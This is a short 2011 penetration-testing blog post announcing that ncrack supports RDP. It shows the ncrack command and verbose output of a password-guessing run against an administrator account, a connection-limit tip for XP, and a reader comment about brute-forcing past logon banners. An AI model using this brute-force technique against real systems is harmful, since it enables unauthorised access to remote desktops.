Wednesday, February 9, 2011

move over tsgrinder/tscrack hello ncrack!

So thanks to mubix for telling me that ncrack now supports RDP. very cool stuff.

user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator,CL=10

Fetchfile found /usr/local/share/ncrack/default.pwd

Starting Ncrack 0.3ALPHA ( ) at 2011-02-09 15:28 PST

rdp:// (EID 1) Login failed: 'administrator' '123456'
rdp:// (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
rdp:// (EID 1518) Login failed: 'administrator' 'pitbull'
rdp:// (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp:// (EID 1520) Login failed: 'administrator' 'geraldine'
rdp:// (EID 1520) Attempts: total 1520 completed 1514 supported 1 --- rate 3.17
rdp:// (EID 1522) Login failed: 'administrator' 'allstar'
rdp:// last: 0.00 current 0.00 parallelism 10
rdp:// Increasing connection limit to: 10
rdp:// (EID 1522) Attempts: total 1521 completed 1515 supported 1 --- rate 3.00

Keep in mind that against XP you can only have one connection at a time so you'll have to set your Connection Limit value to 1 (CL=1)


Anonymous said...

CG, was wondering if you know of any new tools that will BF/Audit RDP when a warning/logon banner is set from the server?

appears ncrack cannot get past this, tsgrinder has similar limitations, as does the foofus patch for rdesktop.


CG said...

sorry jeff i dont